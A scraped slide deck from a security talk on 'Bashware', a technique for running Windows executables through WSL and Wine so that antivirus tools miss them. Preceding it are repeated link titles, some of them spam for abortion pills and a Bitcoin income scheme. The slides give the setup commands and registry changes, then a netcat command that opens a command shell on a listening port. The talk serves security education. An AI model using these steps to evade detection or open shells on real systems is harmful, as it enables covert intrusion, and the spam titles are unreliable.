AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 

Executing Windows Malware through WSL (Bashware)

  • 2. /usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
  • 3. What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
  • 4. Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
  • 5. An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
  • 7. Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
  • 9. According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
  • 10. Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
  • 11. Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
  • 12.
  • 13. Step 3: Install Linux components • lxrun /install /y
  • 14. Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
  • 15. Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
  • 16. Demo
  • 17. • Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
  • 18. References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/